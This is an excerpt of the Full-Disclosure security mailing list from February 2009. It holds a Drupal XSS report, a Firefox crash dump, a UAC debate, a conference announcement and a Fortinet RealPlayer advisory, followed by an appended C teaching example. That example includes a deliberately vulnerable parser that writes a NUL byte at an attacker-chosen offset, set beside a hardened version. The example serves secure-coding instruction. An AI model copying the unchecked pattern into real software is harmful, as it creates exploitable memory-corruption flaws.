The Link module contains an XSS vulnerability in the 'Help' field. Any user with rights to administer content types can edit a content type that contains a link field or create a content type that contains a link field. In the 'Widget settings' fieldset presented during configuration of the specific image field a textarea labeled 'Help text:' is presented. Arbitrary script can be entered into this text area and it is not escaped. This vulnerability is especially dangerous because the script executes whenever a user creates new content of the type with the XSS-infected help text. This potentially exposes site administrators to the XSS attack.
- --
Andrew Rosborough
Information Security and Unix Systems
University of Pennsylvania School of Arts and Sciences

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
Comment: Using GnuPG with Fedora - http://enigmail.mozdev.org

iEYEARECAAYFAkmLJz4ACgkQeHiaLtUKG3wVzACffCUYBVO8HEtJHq8dx5sLpqQI
As4AniXKhWADtlUa/yjKUTIpcVigLe4m
=tNFi
-----END PGP SIGNATURE-----

From Thierry at Zoller.lu Thu Feb 5 17:51:19 2009
From: Thierry at Zoller.lu (Thierry Zoller)
Date: Thu, 5 Feb 2009 18:51:19 +0100
Subject: [Full-disclosure] Nokia N95-8 browser denial of service
In-Reply-To: <200902050601.n1561kh8011869@www3.securityfocus.com>
References: <200902050601.n1561kh8011869@www3.securityfocus.com>
Message-ID: <1582554652.20090205185119@Zoller.lu>

Hi,

Also crashes Firefox 3.06 (latest), Stack overflow. (Not to be confused with a stack buffer overflow.)

Thu Feb 5 18:46:13.828 2009 (GMT+1): (15d8.17ec): Stack overflow - code c00000fd (first chance)
eax=077e4b80 ebx=00000000 ecx=077e4b60 edx=00000000 esi=00000000 edi=077e4b60
eip=604fcc8f esp=00032fa0 ebp=0003304c iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206

Crash seems not to be recorded by the FF crash handler.

Regards,
Thierry

--
http://secdev.zoller.lu
Thierry Zoller

From vigilantgregorius at gmail.com Thu Feb 5 18:52:48 2009
From: vigilantgregorius at gmail.com (Miller Grey) Date: Thu, 5 Feb 2009 12:52:48 -0600 Subject: [Full-disclosure] Windows 7 UAC compromised In-Reply-To: <2df3b0cb0902031340k70ffc9d9l73c095672773228b@mail.gmail.com> References: <8a6b8e350902021047v1028a346iaa60dcbe4c50eb95@mail.gmail.com> <28242.1233601622@turing-police.cc.vt.edu> <003d01c9856a$a3bd2780$eb377680$@co.uk> <2df3b0cb0902031340k70ffc9d9l73c095672773228b@mail.gmail.com> Message-ID: ...what? On Tue, Feb 3, 2009 at 3:40 PM, M.B.Jr. wrote: > Windows says: Hello world! Check this out, world, this is really cool. > Now I have, uh, something like, uh, "privileges management"! > > > > "UAC" is no more than a new commercial designation for something with > about 40 years. > And they (Redmond) are still missing the concept's point. > > > > > > > On Mon, Feb 2, 2009 at 5:14 PM, Christopher Pritchard > wrote: > >> The biggest issue here is that although it's technically easy to fix > >> this problem (just have UAC issue an alert when somebody's messing with > >> the system settings), it involves doing more of what end users dislike > >> most about UAC (it issuing alerts to Joe Sixpack all the time when he > >> does something bone-headed security-wise). > >> > >> Fixing this one in a way that users will put up with will be a bitch. > > > > Why not just have it not prompt if you are changing settings, except for > UAC settings? that would be the simple way around it > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > > > -- > Marcio Barbado, Jr. > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... 
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090205/05ca2e71/attachment.html From kevin at tux.appstate.edu Thu Feb 5 19:32:15 2009 From: kevin at tux.appstate.edu (Kevin Wilcox) Date: Thu, 5 Feb 2009 14:32:15 -0500 Subject: [Full-disclosure] Windows 7 UAC compromised In-Reply-To: References: <8a6b8e350902021047v1028a346iaa60dcbe4c50eb95@mail.gmail.com> <28242.1233601622@turing-police.cc.vt.edu> <003d01c9856a$a3bd2780$eb377680$@co.uk> <2df3b0cb0902031340k70ffc9d9l73c095672773228b@mail.gmail.com> Message-ID: <5d6848b00902051132r23f2a48h5f1287da1b8a4560@mail.gmail.com> 2009/2/5 Miller Grey : > On Tue, Feb 3, 2009 at 3:40 PM, M.B.Jr. wrote: >> Windows says: Hello world! Check this out, world, this is really cool. >> Now I have, uh, something like, uh, "privileges management"! >> "UAC" is no more than a new commercial designation for something with >> about 40 years. >> And they (Redmond) are still missing the concept's point. > ...what? He's saying Microsoft has embraced and extended "privilege management" and "introduced" it as something new, "UAC". He then says Microsoft is daft and missing the entire point of privilege management, even though it's been around for decades and their "UAC" is nothing new. Make sense? kmw -- Far better is it to dare mighty things, to win glorious triumphs, even if chequered by failure, than to take rank with those poor spirits who neither enjoy much nor suffer much, because they live in the grey twilight that knows not victory or defeat. From Valdis.Kletnieks at vt.edu Thu Feb 5 19:38:40 2009 
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Thu, 05 Feb 2009 14:38:40 -0500
Subject: [Full-disclosure] Windows 7 UAC compromised
In-Reply-To: Your message of "Thu, 05 Feb 2009 14:17:32 EST."
References: <8a6b8e350902021047v1028a346iaa60dcbe4c50eb95@mail.gmail.com> <28242.1233601622@turing-police.cc.vt.edu> <003d01c9856a$a3bd2780$eb377680$@co.uk> <2df3b0cb0902031340k70ffc9d9l73c095672773228b@mail.gmail.com>
Message-ID: <26698.1233862720@turing-police.cc.vt.edu>

On Thu, 05 Feb 2009 14:17:32 EST, Jimmy Astle said:
> It all comes back to windows biggest issue, joe the plumber
> shouldn't not be running as a local admin on his box. UAC problem solved! I
> still dont see how redmond missed the concept.

It's *easy* to see how Redmond missed it - they *intentionally* missed it.

You have to keep in mind that as a corporation, Redmond doesn't *really* give a flying f**k in a rolling donut about your computer's security - they care about their profits. We all (including the Redmond guys) know that we could drastically reduce the number of infections by making people run as non-admin and making it damned inconvenient to install possibly untrusted software. But if you care about your profits, you ignore the 4,986 geeks who won't run it because it's a total security mess, and sell it to the 193,472,415 Joe Sixpacks out there, and sell it in a config that lets Joe install any damned thing, because Joe wants his dancing hamster screensaver.

In other words, they'll fix the security problems *only* when they get so bad that even Joe Sixpack (and his corporate counterpart Joe "ya want fries with that" McSE) start insisting that Something Be Done. And even then, they'll only do as much as it takes to maximize the profits (you tighten it too much, and you get double-whammied - tightening more costs more *and* loses you sales).

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available Type: application/pgp-signature Size: 226 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090205/a01dcb4e/attachment.bin From marcio.barbado at gmail.com Thu Feb 5 19:56:44 2009 
From: marcio.barbado at gmail.com (M.B.Jr.) Date: Thu, 5 Feb 2009 17:56:44 -0200 Subject: [Full-disclosure] Windows 7 UAC compromised In-Reply-To: References: <8a6b8e350902021047v1028a346iaa60dcbe4c50eb95@mail.gmail.com> <28242.1233601622@turing-police.cc.vt.edu> <003d01c9856a$a3bd2780$eb377680$@co.uk> <2df3b0cb0902031340k70ffc9d9l73c095672773228b@mail.gmail.com> Message-ID: <2df3b0cb0902051156k7ec72531ie862ebed0466ddf6@mail.gmail.com> Dear Jimmy, you say you can't see how they missed the "privileges management" point. You need to study UNIX. Notwithstanding, being somewhat benevolent with you, just study SELinux. Maybe you see sth, then. Regards, On Thu, Feb 5, 2009 at 5:17 PM, Jimmy Astle wrote: > I am new to the list so hello to everyone..... > > Now for the Windows 7 UAC stuff. > > 1.) Its beta.... its not going to be perfect wait for RC1 before selling 7 > down the river. > 2.) > http://www.informationweek.com/news/security/app-security/showArticle.jhtml?articleID=213001021&subSection=News > > It all comes back to windows biggest issue, joe the plumber > shouldn't not be running as a local admin on his box. UAC problem solved! I > still dont see how redmond missed the concept. > > > > On Thu, Feb 5, 2009 at 1:52 PM, Miller Grey > wrote: >> >> ...what? >> >> On Tue, Feb 3, 2009 at 3:40 PM, M.B.Jr. wrote: >>> >>> Windows says: Hello world! Check this out, world, this is really cool. >>> Now I have, uh, something like, uh, "privileges management"! >>> >>> >>> >>> "UAC" is no more than a new commercial designation for something with >>> about 40 years. >>> And they (Redmond) are still missing the concept's point. 
>>> >>> >>> >>> >>> >>> >>> On Mon, Feb 2, 2009 at 5:14 PM, Christopher Pritchard >>> wrote: >>> >> The biggest issue here is that although it's technically easy to fix >>> >> this problem (just have UAC issue an alert when somebody's messing >>> >> with >>> >> the system settings), it involves doing more of what end users dislike >>> >> most about UAC (it issuing alerts to Joe Sixpack all the time when he >>> >> does something bone-headed security-wise). >>> >> >>> >> Fixing this one in a way that users will put up with will be a bitch. >>> > >>> > Why not just have it not prompt if you are changing settings, except >>> > for UAC settings? that would be the simple way around it >>> > >>> > _______________________________________________ >>> > Full-Disclosure - We believe in it. >>> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html >>> > Hosted and sponsored by Secunia - http://secunia.com/ >>> > >>> >>> >>> >>> -- >>> Marcio Barbado, Jr. >>> >>> _______________________________________________ >>> Full-Disclosure - We believe in it. >>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >>> Hosted and sponsored by Secunia - http://secunia.com/ >> >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ > > -- Marcio Barbado, Jr. From vigilantgregorius at gmail.com Thu Feb 5 20:23:15 2009 
From: vigilantgregorius at gmail.com (Miller Grey) Date: Thu, 5 Feb 2009 14:23:15 -0600 Subject: [Full-disclosure] Windows 7 UAC compromised In-Reply-To: <5d6848b00902051132r23f2a48h5f1287da1b8a4560@mail.gmail.com> References: <8a6b8e350902021047v1028a346iaa60dcbe4c50eb95@mail.gmail.com> <28242.1233601622@turing-police.cc.vt.edu> <003d01c9856a$a3bd2780$eb377680$@co.uk> <2df3b0cb0902031340k70ffc9d9l73c095672773228b@mail.gmail.com> <5d6848b00902051132r23f2a48h5f1287da1b8a4560@mail.gmail.com> Message-ID: No, it doesn't make sense...I don't think Redmond missed the point at all, they're trying to introduce a concept totally new to the everyday user who, like Valdis said, only "...wants his dancing hamster screensaver.", and will blindly click any OK button that pops up. Ultimately, Valdis is right, Redmond cares about profit, and creating an OS that is irritating to the everyday jackass does not help their profits. On Thu, Feb 5, 2009 at 1:32 PM, Kevin Wilcox wrote: > 2009/2/5 Miller Grey : > > > On Tue, Feb 3, 2009 at 3:40 PM, M.B.Jr. > wrote: > > >> Windows says: Hello world! Check this out, world, this is really cool. > >> Now I have, uh, something like, uh, "privileges management"! > > >> "UAC" is no more than a new commercial designation for something with > >> about 40 years. > >> And they (Redmond) are still missing the concept's point. > > > ...what? > > He's saying Microsoft has embraced and extended "privilege management" > and "introduced" it as something new, "UAC". > > He then says Microsoft is daft and missing the entire point of > privilege management, even though it's been around for decades and > their "UAC" is nothing new. > > Make sense? > > kmw > > -- > Far better is it to dare mighty things, to win glorious triumphs, even > if chequered by failure, than to take rank with those poor spirits who > neither enjoy much nor suffer much, because they live in the grey > twilight that knows not victory or defeat. 
> -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090205/3bf66bb9/attachment.html From kevin at tux.appstate.edu Thu Feb 5 20:58:37 2009 
From: kevin at tux.appstate.edu (Kevin Wilcox) Date: Thu, 5 Feb 2009 15:58:37 -0500 Subject: [Full-disclosure] Windows 7 UAC compromised In-Reply-To: References: <8a6b8e350902021047v1028a346iaa60dcbe4c50eb95@mail.gmail.com> <28242.1233601622@turing-police.cc.vt.edu> <003d01c9856a$a3bd2780$eb377680$@co.uk> <2df3b0cb0902031340k70ffc9d9l73c095672773228b@mail.gmail.com> <5d6848b00902051132r23f2a48h5f1287da1b8a4560@mail.gmail.com> Message-ID: <5d6848b00902051258v9984503uad17a15d5412e31a@mail.gmail.com> 2009/2/5 Miller Grey : > No, it doesn't make sense...I don't think Redmond missed the point at all, > they're trying to introduce a concept totally new to the everyday user who, > like Valdis said, only "...wants his dancing hamster screensaver.", and will > blindly click any OK button that pops up. Ultimately, Valdis is right, > Redmond cares about profit, and creating an OS that is irritating to the > everyday jackass does not help their profits. Wait, so is he right when he said all they care about is profit, was he right when he said they intentionally missed it or both? Microsoft market share has absolutely nothing to do with how irritating the computing experience is and has everything to do with product availability and familiarity; basically, it's carried along by inertia. Kind of like the whole, "no one was ever fired for buying [IBM|Cisco|]" deal. Most products that most companies have are MS-centric; if the products are there, and it's what people are used to, no one really gives a flying penny about how irritating the OS is to the average person unless it's completely intolerable. On a level playing field I would say yes, the quality of the computing experience would help dictate the winner in the OS game but this is *not* a level playing field and it's quite easy to just roll along simply because you already have 90%+ of the market with no serious contenders in sight. 
My previous post was made because rather than attempt to refute anything stated by M.B., you just replied with a "blank-stare" style "what?". I neither support nor refute his statements, I was simply rewording them. kmw -- Far better is it to dare mighty things, to win glorious triumphs, even if chequered by failure, than to take rank with those poor spirits who neither enjoy much nor suffer much, because they live in the grey twilight that knows not victory or defeat. From vigilantgregorius at gmail.com Thu Feb 5 21:25:46 2009 
From: vigilantgregorius at gmail.com (Miller Grey) Date: Thu, 5 Feb 2009 15:25:46 -0600 Subject: [Full-disclosure] Windows 7 UAC compromised In-Reply-To: <5d6848b00902051258v9984503uad17a15d5412e31a@mail.gmail.com> References: <8a6b8e350902021047v1028a346iaa60dcbe4c50eb95@mail.gmail.com> <28242.1233601622@turing-police.cc.vt.edu> <003d01c9856a$a3bd2780$eb377680$@co.uk> <2df3b0cb0902031340k70ffc9d9l73c095672773228b@mail.gmail.com> <5d6848b00902051132r23f2a48h5f1287da1b8a4560@mail.gmail.com> <5d6848b00902051258v9984503uad17a15d5412e31a@mail.gmail.com> Message-ID: ...sometimes I prefer the blank-stare approach, maybe it's these neon lights radiating into my cube, or maybe it's because I find the Microsoft sucks argument boring...anyway... On Thu, Feb 5, 2009 at 2:58 PM, Kevin Wilcox wrote: > 2009/2/5 Miller Grey : > > No, it doesn't make sense...I don't think Redmond missed the point at > all, > > they're trying to introduce a concept totally new to the everyday user > who, > > like Valdis said, only "...wants his dancing hamster screensaver.", and > will > > blindly click any OK button that pops up. Ultimately, Valdis is right, > > Redmond cares about profit, and creating an OS that is irritating to the > > everyday jackass does not help their profits. > > Wait, so is he right when he said all they care about is profit, was he right when he said they intentionally missed it or both? Both...every corporation revolves exclusively around profit...and yes, they did intentionally miss the point, I would imagine MS is well-aware of the history of UNIX privilege management... Microsoft market share has absolutely nothing to do with how > irritating the computing experience is and has everything to do with > product availability and familiarity; Isn't this the same thing? Irritating consumers who know only one operating system? Consumers are upset with UAC because it is irritating, they have no concept of a control. > basically, it's carried along by > inertia. 
Kind of like the whole, "no one was ever fired for buying > [IBM|Cisco|]" deal. Most products that most > companies have are MS-centric; if the products are there, and it's > what people are used to, no one really gives a flying penny about how > irritating the OS is to the average person unless it's completely > intolerable. I would agree...on the assumption that the majority of consumers are Vista users since the adoption rate in the corporate world is nil...the corporate world would give a flying penny... > On a level playing field I would say yes, the quality of > the computing experience would help dictate the winner in the OS game > but this is *not* a level playing field and it's quite easy to just > roll along simply because you already have 90%+ of the market with no > serious contenders in sight. I concur...(I love saying that)... My previous post was made because rather than attempt to refute > anything stated by M.B., you just replied with a "blank-stare" style > "what?". I neither support nor refute his statements, I was simply > rewording them. In the future I will keep my blank stares to myself...but the crux of the argument to me is not whether MS sux or not (I don't care)...the argument is whether or not the concept of UAC (not who came up with) as implemented by Microsoft in Windows 7 is a good one...c'est tout cheers, vg > > kmw > > -- > Far better is it to dare mighty things, to win glorious triumphs, even > if chequered by failure, than to take rank with those poor spirits who > neither enjoy much nor suffer much, because they live in the grey > twilight that knows not victory or defeat. > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090205/1ad0307f/attachment.html From marcio.barbado at gmail.com Thu Feb 5 21:29:35 2009 
From: marcio.barbado at gmail.com (M.B.Jr.)
Date: Thu, 5 Feb 2009 19:29:35 -0200
Subject: [Full-disclosure] Windows 7 UAC compromised
In-Reply-To: <5d6848b00902051258v9984503uad17a15d5412e31a@mail.gmail.com>
References: <8a6b8e350902021047v1028a346iaa60dcbe4c50eb95@mail.gmail.com> <28242.1233601622@turing-police.cc.vt.edu> <003d01c9856a$a3bd2780$eb377680$@co.uk> <2df3b0cb0902031340k70ffc9d9l73c095672773228b@mail.gmail.com> <5d6848b00902051132r23f2a48h5f1287da1b8a4560@mail.gmail.com> <5d6848b00902051258v9984503uad17a15d5412e31a@mail.gmail.com>
Message-ID: <2df3b0cb0902051329x78a56717i2b68af65dabb1aaa@mail.gmail.com>

Comments below.

On Thu, Feb 5, 2009 at 6:58 PM, Kevin Wilcox wrote:
> 2009/2/5 Miller Grey :
>> No, it doesn't make sense...I don't think Redmond missed the point at all,
>> they're trying to introduce a concept totally new to the everyday user who,
>> like Valdis said, only "...wants his dancing hamster screensaver.", and will
>> blindly click any OK button that pops up. Ultimately, Valdis is right,
>> Redmond cares about profit, and creating an OS that is irritating to the
>> everyday jackass does not help their profits.
>
> Wait, so is he right when he said all they care about is profit, was
> he right when he said they intentionally missed it or both?

No, he isn't. But they're an enterprise, and they like money more than good code.

The Marxist product-based profit posture enforced in the referred software vendor is a curse through which organizations let quality go for the mere financial benefit of some banking accounts. Agile methodologies and their horrible "extreme programming" (XP) premises constitute a few examples.

--
Marcio Barbado, Jr.

From cfp at ucon-conference.org Thu Feb 5 21:32:17 2009
From: cfp at ucon-conference.org (uCon Security Conference)
Date: Thu, 05 Feb 2009 18:32:17 -0300
Subject: [Full-disclosure] Speaking line up confirmed! uCon Security Conference 2009 - Recife, Brazil
Message-ID: <498B5AE1.5080403@ucon-conference.org>

The complete list of speakers of uCon Security Conference 2009 has been announced. The organizing committee would like to thank everyone who submitted their proposals.

The conference will take place three days after the most insane street carnival in the world in Recife, Brazil, on 28th February 2009 and will also feature training sessions on 26th and 27th. If you are outside Brazil and plan to attend uCon, please contact us if you need any assistance with your travel. Carnival and hacking in a row, rather unique. Don't miss the chance.

For more information please visit http://www.ucon-conference.org

PS: All training sessions will be delivered in Portuguese.

[--- SPEAKING LINE UP ---]

Speaker: Jayson Street, CISSP (Stratagem One)
Keynote: "Dispelling the myths and discussing the facts of global cyber-warfare"
Language: English
Track: Information warfare

Speaker: Stephen Ridley (Matasano)
Speech: "Intro to Windows Kernel Security Development"
Language: English
Track: Kernel hacking / reverse engineering / vuln-dev

Speaker: Julio Auto (Independent researcher)
Speech: "Practical (Introduction to) Reverse Engineering"
Language: Portuguese
Track: Reverse engineering

Speaker: Rodrigo Rubira Branco aka BSDaemon (Checkpoint / COSEINC)
Speech: "Advanced Payload Strategies: What is new, what works and what is hoax?"
Language: Portuguese
Track: Vuln-dev / shellcoding

Speaker: Joseph McCray (Rapid7 / LearnSecurityOnline.com)
Speech: "Advanced SQL Injection"
Language: English
Track: Web hacking

Speaker: Gustavo Monteiro (Independent researcher)
Speech: "Secure log centralization, analysis & security visualization"
Language: Portuguese
Track: Log & event correlation / security visualization

Speaker: David Batanero (Independent researcher)
Speech: "GSM for fun and profit"
Language: English
Track: Telecom security

Speaker: Felipe Andres Manzano (Nimbuzz.com)
Speech: "Exploiting PDF Readers"
Language: English
Track: Vuln-dev / software testing

Speaker: Tiago Assumpcao (zynamics)
Speech: "Ut cognitione visus: ut ipso intellecto - BinNavi 2.0"
Language: Portuguese
Track: Reverse engineering

Speaker: Gustavo Pimentel Bittencourt and Julio Cesar Fort (Digital Trust)
Speech: "From theory to practice - Bringing down the house with extended DHCP exhaustion attack"
Language: Portuguese
Track: Attack

See you in Brazil!

Sincerely,
Organizing committee, uCon Security Conference
http://www.ucon-conference.org

From astle.j at gmail.com Thu Feb 5 19:17:32 2009
From: astle.j at gmail.com (Jimmy Astle) Date: Thu, 5 Feb 2009 14:17:32 -0500 Subject: [Full-disclosure] Windows 7 UAC compromised In-Reply-To: References: <8a6b8e350902021047v1028a346iaa60dcbe4c50eb95@mail.gmail.com> <28242.1233601622@turing-police.cc.vt.edu> <003d01c9856a$a3bd2780$eb377680$@co.uk> <2df3b0cb0902031340k70ffc9d9l73c095672773228b@mail.gmail.com> Message-ID: I am new to the list so hello to everyone..... Now for the Windows 7 UAC stuff. 1.) Its beta.... its not going to be perfect wait for RC1 before selling 7 down the river. 2.) http://www.informationweek.com/news/security/app-security/showArticle.jhtml?articleID=213001021&subSection=News It all comes back to windows biggest issue, joe the plumber shouldn't not be running as a local admin on his box. UAC problem solved! I still dont see how redmond missed the concept. On Thu, Feb 5, 2009 at 1:52 PM, Miller Grey wrote: > ...what? > > On Tue, Feb 3, 2009 at 3:40 PM, M.B.Jr. wrote: > >> Windows says: Hello world! Check this out, world, this is really cool. >> Now I have, uh, something like, uh, "privileges management"! >> >> >> >> "UAC" is no more than a new commercial designation for something with >> about 40 years. >> And they (Redmond) are still missing the concept's point. >> >> >> >> >> >> >> On Mon, Feb 2, 2009 at 5:14 PM, Christopher Pritchard >> wrote: >> >> The biggest issue here is that although it's technically easy to fix >> >> this problem (just have UAC issue an alert when somebody's messing with >> >> the system settings), it involves doing more of what end users dislike >> >> most about UAC (it issuing alerts to Joe Sixpack all the time when he >> >> does something bone-headed security-wise). >> >> >> >> Fixing this one in a way that users will put up with will be a bitch. >> > >> > Why not just have it not prompt if you are changing settings, except for >> UAC settings? 
that would be the simple way around it >> > >> > _______________________________________________ >> > Full-Disclosure - We believe in it. >> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> > Hosted and sponsored by Secunia - http://secunia.com/ >> > >> >> >> >> -- >> Marcio Barbado, Jr. >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090205/9e3492ec/attachment.html From noreply-secresearch at fortinet.com Fri Feb 6 01:35:01 2009 
From: noreply-secresearch at fortinet.com (noreply-secresearch at fortinet.com)
Date: Thu, 5 Feb 2009 17:35:01 -0800
Subject: [Full-disclosure] RealNetworks RealPlayer IVR File Processing Multiple Code Execute Vulnerabilities
Message-ID: <200902060135.n161Z143024019@smtp.fortinet.com>

RealNetworks RealPlayer IVR File Processing Multiple Code Execute Vulnerabilities

2009.February.05

Fortinet's FortiGuard Global Security Research Team Discovers Two Vulnerabilities in RealNetworks RealPlayer.

Summary:
========
Two code execute vulnerabilities exist in RealNetworks RealPlayer 11 through malformed IVR files.

Impact:
=======
Remote Code Execution.

Risk:
=====
Critical

Affected Software:
==================
RealNetworks RealPlayer 11

Additional Information:
=======================
Internet Video Recording (IVR) files contain media content that is played and recorded by RealPlayer. A remote attacker could craft a malicious IVR file that, when sent to an unsuspecting user, may allow the execution of arbitrary code when viewed, using one of two vulnerabilities in RealPlayer's IVR processing routine:

* A heap corruption vulnerability that occurs when altering a field that determines the length of a structure
* A vulnerability that allows an attacker to write one null byte to an arbitrary memory address by using an overly long file name length value

It should be noted that the victim does not necessarily have to open the malicious file for exploitation to occur: the vulnerabilities lie in a DLL that is also used as a plugin for the Windows Explorer shell. A successful attack could take place by merely previewing the IVR file through Windows Explorer.

Solutions:
==========
The FortiGuard Global Security Research Team released the signature "RealNetworks.RealPlayer.IVR.File.Processing.Code.Execution". Fortinet customers who subscribe to Fortinet's intrusion prevention (IPS) service should be protected against these code execute vulnerabilities.
Fortinet's IPS service is one component of FortiGuard Subscription Services, which also offer comprehensive solutions such as antivirus, Web content filtering and antispam capabilities. These services enable protection against threats on both application and network layers. FortiGuard Services are continuously updated by the FortiGuard Global Security Research Team, which enables Fortinet to deliver a combination of multi-layered security intelligence and true zero-day protection from new and emerging threats. These updates are delivered to all FortiGate, FortiMail and FortiClient products. Fortinet strictly follows responsible disclosure guidelines to ensure optimum protection during a threat's lifecycle.

Acknowledgement:
================
Haifei Li of Fortinet's FortiGuard Global Security Research Team

References:
===========
FortiGuard Advisory
http://www.fortiguardcenter.com/advisory/FGA-2009-04.html

CVE ID: CVE-2009-0375 (one byte rewrite)
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0375

CVE ID: CVE-2009-0376 (heap corruption)
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0376
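The two bug classes named in the Fortinet advisory above (a terminating null byte written at an attacker-chosen offset because a file name length is trusted, and a structure length field trusted beyond the bytes actually present) are easiest to see with a vulnerable parser beside its hardened form. The block below is an added example written for this page; it is not Fortinet's or RealNetworks' code and the advisory does not disclose the real IVR layout, so the record format (u32 name_len, name bytes, u32 payload_len, payload), the NAME_MAX bound, the arena_t sandbox and every function name are constructed for illustration.

```c
/*
 * Added example, not vendor code. Constructed stand-in for an IVR-like
 * record:   u32 name_len | name bytes | u32 payload_len | payload bytes
 * Demonstrates the two advisory bug classes: a NUL written at an
 * attacker-chosen offset (overly long name length) and a length field
 * trusted beyond the data present (heap corruption class).
 */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define NAME_MAX 32

typedef struct {
    char     name[NAME_MAX];
    uint32_t payload_len;
} ivr_record_t;

/* Sandbox standing in for the heap around the record: record first, a gap,
 * then a sentinel byte playing the part of whatever an exploit would want
 * zeroed (a size field, the low byte of a pointer, ...). */
typedef struct {
    ivr_record_t rec;        /* rec.name therefore sits at arena offset 0 */
    uint8_t      gap[64];
    uint8_t      sentinel;   /* 0xAA before parsing; 0x00 once clobbered */
} arena_t;

static uint32_t rd_le32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

static void wr_le32(uint8_t *p, uint32_t v) {
    p[0] = (uint8_t)v;         p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

/* Vulnerable pattern: name_len is taken straight from the file. The copy
 * stops at end of input (as a short fread() would), but the terminator is
 * then written at name[name_len]: one NUL at an attacker-chosen offset. */
static int parse_ivr_unchecked(arena_t *a, const uint8_t *buf, size_t len) {
    if (len < 4) return -1;
    uint32_t name_len = rd_le32(buf);
    size_t avail = len - 4;
    memcpy(a->rec.name, buf + 4, name_len < avail ? name_len : avail);
    a->rec.name[name_len] = '\0';            /* BUG: no bound against NAME_MAX */
    return 0;
}

/* Hardened pattern: every length from the file is checked against both the
 * destination buffer and the bytes actually present before it is used. */
static int parse_ivr_checked(arena_t *a, const uint8_t *buf, size_t len) {
    if (len < 4) return -1;
    uint32_t name_len = rd_le32(buf);
    if (name_len >= NAME_MAX) return -2;                        /* room for NUL */
    if (name_len > len - 4 || len - 4 - name_len < 4) return -3; /* truncated */
    memcpy(a->rec.name, buf + 4, name_len);
    a->rec.name[name_len] = '\0';
    a->rec.payload_len = rd_le32(buf + 4 + name_len);
    if (a->rec.payload_len > len - 8 - name_len) return -4;     /* field overstates data */
    return 0;
}

/* Builds a constructed file image in `out`; returns its length. */
static size_t build_ivr(uint8_t *out, uint32_t name_len_field, const char *name,
                        uint32_t payload_len_field, const uint8_t *payload, size_t nbytes) {
    size_t n = strlen(name);
    wr_le32(out, name_len_field);
    memcpy(out + 4, name, n);
    wr_le32(out + 4 + n, payload_len_field);
    if (nbytes) memcpy(out + 8 + n, payload, nbytes);
    return 8 + n + nbytes;
}

/* name_len chosen so that name[name_len] lands on the sentinel. Returns 1
 * when the unchecked parser zeroed it. */
int demo_unchecked_clobbers_sentinel(void) {
    arena_t a; memset(&a, 0, sizeof a); a.sentinel = 0xAA;
    uint8_t file[64];
    size_t len = build_ivr(file, (uint32_t)offsetof(arena_t, sentinel), "evil.ivr", 0, NULL, 0);
    parse_ivr_unchecked(&a, file, len);
    return a.sentinel == 0x00;
}

/* Same input against the hardened parser: returns its error code (-2). */
int demo_checked_rejects_malicious(void) {
    arena_t a; memset(&a, 0, sizeof a);
    uint8_t file[64];
    size_t len = build_ivr(file, (uint32_t)offsetof(arena_t, sentinel), "evil.ivr", 0, NULL, 0);
    return parse_ivr_checked(&a, file, len);
}

/* Well-formed input parses: returns 0 and fills name/payload_len. */
int demo_checked_parses_benign(void) {
    arena_t a; memset(&a, 0, sizeof a);
    static const uint8_t payload[2] = {0xAB, 0xCD};
    uint8_t file[64];
    size_t len = build_ivr(file, 4, "clip", 2, payload, sizeof payload);
    int rc = parse_ivr_checked(&a, file, len);
    if (rc != 0) return rc;
    return (strcmp(a.rec.name, "clip") == 0 && a.rec.payload_len == 2) ? 0 : -99;
}

/* A payload_len that claims far more than the file holds: rejected (-4). */
int demo_checked_rejects_oversized_payload(void) {
    arena_t a; memset(&a, 0, sizeof a);
    static const uint8_t payload[2] = {0xAB, 0xCD};
    uint8_t file[64];
    size_t len = build_ivr(file, 4, "clip", 1000, payload, sizeof payload);
    return parse_ivr_checked(&a, file, len);
}

int main(void) {
    printf("unchecked clobbers sentinel: %d\n", demo_unchecked_clobbers_sentinel());
    printf("checked on malicious:        %d\n", demo_checked_rejects_malicious());
    printf("checked on benign:           %d\n", demo_checked_parses_benign());
    printf("checked on oversized payload:%d\n", demo_checked_rejects_oversized_payload());
    return 0;
}
```

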